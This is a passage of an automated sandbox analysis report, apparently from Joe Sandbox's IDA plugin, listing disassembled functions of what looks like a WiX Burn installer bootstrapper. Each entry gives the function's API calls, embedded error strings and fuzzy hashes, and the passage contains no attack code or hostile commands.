Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: MessagePostWindow
String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
API String ID: 3618638489-3051724725
Opcode ID: efb635772d08aea6a77c5a3d5050ee70a0395b166c3ba7f06d9fdb56b74a6d83
Instruction ID: 762987df23b32333d9298cc50897122362e2c2540387565f97d7e387d388dc92
Opcode Fuzzy Hash: efb635772d08aea6a77c5a3d5050ee70a0395b166c3ba7f06d9fdb56b74a6d83
Instruction Fuzzy Hash: 0841D4B1A40A1AFBDB665E60CC59FBABB6CFF00760F00422EB814A6250D769ED5097D0

Function 007CCABE Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 144COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,?,000000FF,007C5381,?,007C52B5,00000000,007C5381,FFF9E89D,007C5381,007C53B5,007C533D,?), ref: 007CCB15

Strings

Failed to get directory portion of local file path, xrefs: 007CCBEE
=S|, xrefs: 007CCADC, 007CCBB7
Failed to extract file., xrefs: 007CCBE0
Failed to get next stream., xrefs: 007CCBFC
Failed to ensure directory exists, xrefs: 007CCBE7
payload.cpp, xrefs: 007CCC16
=S|, xrefs: 007CCB77, 007CCC44
Failed to find embedded payload: %ls, xrefs: 007CCB41
Payload was not found in container: %ls, xrefs: 007CCC22
Failed to concat file paths., xrefs: 007CCBF5

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: =S|$=S|$Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
API String ID: 1825529933-2076936014
Opcode ID: cfeaf31a847f2426a895457fede885f8a315d1c7a22b629596d37011b939ecac
Instruction ID: 9b417c2a5c58b00d24391196fbf9552f2fcf3a29918450b0fb275408f0f58a2a
Opcode Fuzzy Hash: cfeaf31a847f2426a895457fede885f8a315d1c7a22b629596d37011b939ecac
Instruction Fuzzy Hash: 9A41BF71900219EBCF26DF84CD82FAEB775FF00710F10816DE919AB292D6389D41DBA1

Function 007DEDFE Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 007C38D4: GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
Part of subcall function 007C38D4: RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 007DEE1B
LeaveCriticalSection.KERNEL32(?), ref: 007DEF48

Strings

UX requested unknown approved exe with id: %ls, xrefs: 007DEE7B
user is active, cannot change user state., xrefs: 007DEE36
Failed to post launch approved exe message., xrefs: 007DEF33
Failed to copy the id., xrefs: 007DEEAD
Failed to copy the arguments., xrefs: 007DEEDA
userForApplication.cpp, xrefs: 007DEF29

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalHeapSection$AllocateEnterLeaveProcess
String ID: user is active, cannot change user state.$userForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
API String ID: 1367039788-528931743
Opcode ID: a8cf4f68ff233c87dcb2b210bc255d48a9d5c87af4cb41241729357e2acfe6a4
Instruction ID: 00610a2ca0ec95514e8893a5cdd69aa13a2e159a7fffd9a29cfbda6c14f5c2a9
Opcode Fuzzy Hash: a8cf4f68ff233c87dcb2b210bc255d48a9d5c87af4cb41241729357e2acfe6a4
Instruction Fuzzy Hash: 9B31C332A40225ABEB52AF64DC49F6B77B8EF04720B05812AFD04EF351E738DD4097A1

Function 007D9496 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000,?,00000000,?,007DA5CE,?,00000000,?,?,007EB041), ref: 007D94B1
GetLastError.KERNEL32(?,007DA5CE,?,00000000,?,?,007EB041,?,00000000,?,00000000,?,?,007EB041,?), ref: 007D94BF
CloseHandle.KERNEL32(?,007EB041,00000001,00000003,000007D0,?,?,007EB041,?), ref: 007D959E

Strings

Failed to open container in working path: %ls, xrefs: 007D94EE
Failed to verify container hash: %ls, xrefs: 007D9520
Moving, xrefs: 007D9540, 007D9548
Copying, xrefs: 007D9533
Failed to move %ls to %ls, xrefs: 007D9576
Failed to copy %ls to %ls, xrefs: 007D958C
%ls container from working path '%ls' to path '%ls', xrefs: 007D9549
cache.cpp, xrefs: 007D94E3

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
API String ID: 2528220319-1187406825
Opcode ID: 21f4a19e9b67498c32c0792b35aefcfb1972fdabad4fdd169ab45a679622f77d
Instruction ID: cee88f2540aaaebf4d4aa887ba2d78213d6b52e80ae5d7968999c12831d84cb9
Opcode Fuzzy Hash: 21f4a19e9b67498c32c0792b35aefcfb1972fdabad4fdd169ab45a679622f77d
Instruction Fuzzy Hash: D2213A71B807247BE7221A289C46FAB363CFF51B20F00012DFE16FA3C0D2A59D6185E1

Function 007C6E5A Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 227COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 007C6E89
LeaveCriticalSection.KERNEL32(?), ref: 007C7095

Strings

Failed to read variable name., xrefs: 007C707E
Failed to set variable value., xrefs: 007C7048
Failed to read variable value as string., xrefs: 007C7062
Failed to read variable literal flag., xrefs: 007C7070
Failed to read variable included flag., xrefs: 007C7085
Failed to set variable., xrefs: 007C7069
Unsupported variable type., xrefs: 007C705B
Failed to read variable count., xrefs: 007C6EA9
Failed to read variable value type., xrefs: 007C7077
Failed to read variable value as number., xrefs: 007C704F

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
API String ID: 3168844106-528957463
Opcode ID: b07c05a444615c596dee810913c59fb4f6285b15527708c0bf806d1aca8fc2fb
Instruction ID: 37e7918647ef5d50bf354f60748160765a92b681ef88ea3d82f0a4fb82510344
Opcode Fuzzy Hash: b07c05a444615c596dee810913c59fb4f6285b15527708c0bf806d1aca8fc2fb
Instruction Fuzzy Hash: 89718D72C0561AAACB25DEA4CC45FAEBBB9FF04710F10412DF910A6290DB39DE51DF90

Function 008043A6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 247fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 00804425
GetLastError.KERNEL32 ref: 0080443B
GetFileSizeEx.KERNEL32(00000000,?), ref: 00804486
GetLastError.KERNEL32 ref: 00804490
CloseHandle.KERNEL32(?), ref: 00804650

Strings

fileutil.cpp, xrefs: 008043C6, 0080446F, 008044B0, 00804633

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleSize
String ID: fileutil.cpp
API String ID: 3555958901-2967768451
Opcode ID: 522ee3e064a4cf648d179ed6ca20d536dbb3115a70326e54d2346d68964e0a32
Instruction ID: e1806e9369d8d026ac7c17a8c5c73c31b4c52d2bd5f22ef695e05aa86b9d689d
Opcode Fuzzy Hash: 522ee3e064a4cf648d179ed6ca20d536dbb3115a70326e54d2346d68964e0a32
Instruction Fuzzy Hash: C97125B1A80619EBEB618E698C45F6B73D8FF40324F115129FE25EB2D0E779CD008B94

Function 007C2DE0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 198sleepfiletimeCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001,00000000,00000000), ref: 007C2E7A
GetLastError.KERNEL32 ref: 007C2E84
GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 007C2F1F
CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 007C2FAD
GetLastError.KERNEL32 ref: 007C2FBA
Sleep.KERNEL32(00000064), ref: 007C2FCC
CloseHandle.KERNEL32(?), ref: 007C302C

Strings

%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 007C2F7D
pathutil.cpp, xrefs: 007C2EA8
4#v, xrefs: 007C2E7A

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
String ID: 4#v$%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
API String ID: 3480017824-1777530710
Opcode ID: 42280a962333b5b25a413fd730dc91e9858a3bb789dd8a5cb22e9674d52ed5de
Instruction ID: d52ba2c7f057f73b5722b6eaa7295d90e07846853bf1df54b92b59e6f59f9435
Opcode Fuzzy Hash: 42280a962333b5b25a413fd730dc91e9858a3bb789dd8a5cb22e9674d52ed5de
Instruction Fuzzy Hash: 70715372941629ABDB709BA4DC48FAAB3F9EB08710F0041ADF905E7191D7789EC18F60

Function 007D4B96 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 122COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 007D4BC9
StringFromGUID2.OLE32(?,?,00000027), ref: 007D4BF8
UuidCreate.RPCRT4(?), ref: 007D4C43
StringFromGUID2.OLE32(?,?,00000027), ref: 007D4C6F

Strings

BurnPipe.%s, xrefs: 007D4C24
pipe.cpp, xrefs: 007D4C09, 007D4C56
Failed to create pipe guid., xrefs: 007D4BD6
Failed to allocate pipe name., xrefs: 007D4C38
Failed to allocate pipe secret., xrefs: 007D4C98
Failed to convert pipe guid into string., xrefs: 007D4C15

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CreateFromStringUuid
String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
API String ID: 4041566446-2510341293
Opcode ID: ad7f1151a39e43c8f5c1f8fbc9a510295abccb1da41d954d6f268dc6d4ffd7d2
Instruction ID: 4d43ba84e6b2e9294d1170515ca46254342e809cfcaebd7f059605c90c4b69e9
Opcode Fuzzy Hash: ad7f1151a39e43c8f5c1f8fbc9a510295abccb1da41d954d6f268dc6d4ffd7d2
Instruction Fuzzy Hash: 38416DB2D01708EBDB20DBE4C945EDEB7B8AB54710F21412AE909EB340D6789A45CBA0

Function 007C5F14 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 105timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 007C5F3F
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 007C5F53
GetLastError.KERNEL32 ref: 007C5F65
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 007C5FB8
GetLastError.KERNEL32 ref: 007C5FC2

Strings

Failed to get the Date., xrefs: 007C5FE6
Failed to allocate the buffer for the Date., xrefs: 007C5FA0
Failed to set variant value., xrefs: 007C5FFF
Failed to get the required buffer length for the Date., xrefs: 007C5F89
variable.cpp, xrefs: 007C5F7F, 007C5FDC

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: DateErrorFormatLast$SystemTime
String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
API String ID: 2700948981-3682088697
Opcode ID: c57ab0f289ab3e5e83e20b687a4b7ce51dd68eb805c1cb07bf0d4abc98dd7771
Instruction ID: f280a14cc219cf43a4beca93ace60195ef50a163922b8e1614dde1824fb91481
Opcode Fuzzy Hash: c57ab0f289ab3e5e83e20b687a4b7ce51dd68eb805c1cb07bf0d4abc98dd7771
Instruction Fuzzy Hash: 7E31AB72A40715ABD721ABE9CC45FAF7BA8FF04710F10402DFA01F7290D6699D4086E1

Function 007DE82A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 99threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,007C5386,?,?), ref: 007DE84A
GetLastError.KERNEL32(?,007C5386,?,?), ref: 007DE857
CreateThread.KERNEL32(00000000,00000000,007DE563,?,00000000,00000000), ref: 007DE8B0
GetLastError.KERNEL32(?,007C5386,?,?), ref: 007DE8BD
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,007C5386,?,?), ref: 007DE8F8
CloseHandle.KERNEL32(00000000,?,007C5386,?,?), ref: 007DE917
CloseHandle.KERNEL32(?,?,007C5386,?,?), ref: 007DE924

Strings

Failed to create initialization event., xrefs: 007DE882
uithread.cpp, xrefs: 007DE878, 007DE8DE
Failed to create the UI thread., xrefs: 007DE8E8

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
API String ID: 2351989216-3599963359
Opcode ID: 97b671edbe09a399f6e58e7ede4e278901f40d1d94b74bf552270512dc280c46
Instruction ID: 25a4b7015c7cf5fd55fc90c837b83c567b28e6d357d668b035f2fb21c39073f9
Opcode Fuzzy Hash: 97b671edbe09a399f6e58e7ede4e278901f40d1d94b74bf552270512dc280c46
Instruction Fuzzy Hash: 8B316671E00219BFEB51AFA99D84AAFB7FCFF08350F11412AF915F7250D6349E008AA1

Function 007DE3F4 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 95threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,007C5386,?,?), ref: 007DE415
GetLastError.KERNEL32(?,?,007C5386,?,?), ref: 007DE422
CreateThread.KERNEL32(00000000,00000000,007DE177,00000000,00000000,00000000), ref: 007DE481
GetLastError.KERNEL32(?,?,007C5386,?,?), ref: 007DE48E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,007C5386,?,?), ref: 007DE4C9
CloseHandle.KERNEL32(?,?,?,007C5386,?,?), ref: 007DE4DD
CloseHandle.KERNEL32(?,?,?,007C5386,?,?), ref: 007DE4EA

Strings

Failed to create UI thread., xrefs: 007DE4B9
splashscreen.cpp, xrefs: 007DE443, 007DE4AF
Failed to create modal event., xrefs: 007DE44D

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
API String ID: 2351989216-1977201954
Opcode ID: 09f8e020ce4617121cc8218943efde92eb00e459fceb7192dd93058ae98f7ffb
Instruction ID: df3a3934ebfc5e317afaef49207ddfe021e33c5d551aa67213338761ece78a41
Opcode Fuzzy Hash: 09f8e020ce4617121cc8218943efde92eb00e459fceb7192dd93058ae98f7ffb
Instruction Fuzzy Hash: 8F316F75D00619BBEB11ABA99C45AAFBBF8FF44710F10812AFD15E7250D7784A408AA1

Function 007E1224 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,76232F60,?,?,007C52FD,007C52B5,00000000,007C533D), ref: 007E1249
GetLastError.KERNEL32 ref: 007E125C
GetExitCodeThread.KERNEL32(0080B478,?), ref: 007E129E
GetLastError.KERNEL32 ref: 007E12AC
ResetEvent.KERNEL32(0080B450), ref: 007E12E7
GetLastError.KERNEL32 ref: 007E12F1

Strings

cabextract.cpp, xrefs: 007E1280, 007E12D0, 007E1315
Failed to wait for operation complete event., xrefs: 007E128D
Failed to reset operation complete event., xrefs: 007E1322
Failed to get extraction thread exit code., xrefs: 007E12DD

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
API String ID: 2979751695-3400260300
Opcode ID: 82aa886fd3d5f441949c882445442f29ae7f9cdb9444110b7c2c6374b9a8f9c6
Instruction ID: 91f30a530de34e52dfacb3276a81cd2724a496130c5c7a7cedb9d7a22042c063
Opcode Fuzzy Hash: 82aa886fd3d5f441949c882445442f29ae7f9cdb9444110b7c2c6374b9a8f9c6
Instruction Fuzzy Hash: 3E21C371701304EFEB189B7ACD46ABE77F8FF08710F50412EB966D66A0E738CA409A15

Function 007CD5C0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?,007C46F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,007C5386,?,?), ref: 007CD5CD
GetLastError.KERNEL32(?,007C46F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,007C5386,?,?), ref: 007CD5DA
GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 007CD612
GetLastError.KERNEL32(?,007C46F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,007C5386,?,?), ref: 007CD61E

Strings

Failed to create UX., xrefs: 007CD662
BootstrapperApplicationCreate, xrefs: 007CD60C
Failed to load UX DLL., xrefs: 007CD605
wininet.dll, xrefs: 007CD5F8, 007CD63C, 007CD667
userexperience.cpp, xrefs: 007CD5FB, 007CD63F
Failed to get BootstrapperApplicationCreate entry-point, xrefs: 007CD649

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp$wininet.dll
API String ID: 1866314245-1140179540
Opcode ID: f8edcdbc63784c02ac87e3e76363954749d9eba2e51818b6323289c05f5caa46
Instruction ID: 6be5e9fa681537b62f6b0ffb9062aea77ce69eb3e715cef617eb096f5ca4f29d
Opcode Fuzzy Hash: f8edcdbc63784c02ac87e3e76363954749d9eba2e51818b6323289c05f5caa46
Instruction Fuzzy Hash: BE118F32A40B22ABEB715A699C05F5777D4EB05790F01813EFE19F7A90EE28DC018AD4

Function 007D91F7 Relevance: 16.7, APIs: 2, Strings: 9, Instructions: 223COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 007D9297
GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 007D92BB

Strings

Failed to allocate string., xrefs: 007D932D
Failed to encode file hash., xrefs: 007D934A
Could not close verify handle., xrefs: 007D944E
0, xrefs: 007D9357
Could not verify file %ls., xrefs: 007D9400
Failed to allocate memory, xrefs: 007D9268
$, xrefs: 007D9396
cache.cpp, xrefs: 007D92DB, 007D93F3, 007D9444
Failed to get file hash., xrefs: 007D92E5

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast
String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
API String ID: 1452528299-4263581490
Opcode ID: 0503763c0473b7ca13e12bb3fd3235f8f1591f737dda6cac090b72be236e3c0f
Instruction ID: 5809c519043dc4dbb4d2c946475d1932a6e464b1d171cb60bc7e18fec617a849
Opcode Fuzzy Hash: 0503763c0473b7ca13e12bb3fd3235f8f1591f737dda6cac090b72be236e3c0f
Instruction Fuzzy Hash: 25715371D00229EADB11DBA8CC45BEFB7F8EF08710F11412AEA15F7291E77899458BA1

Function 007DE31B Relevance: 16.6, APIs: 11, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 007DE326
DefWindowProcW.USER32(?,00000082,?,?), ref: 007DE364
SetWindowLongW.USER32(?,000000EB,00000000), ref: 007DE371
SetWindowLongW.USER32(?,000000EB,?), ref: 007DE380
DefWindowProcW.USER32(?,?,?,?), ref: 007DE38E
CreateCompatibleDC.GDI32(?), ref: 007DE39A
SelectObject.GDI32(00000000,00000000), ref: 007DE3AB
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 007DE3CD
SelectObject.GDI32(00000000,00000000), ref: 007DE3D5
DeleteDC.GDI32(00000000), ref: 007DE3D8
PostQuitMessage.USER32(00000000), ref: 007DE3E6

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

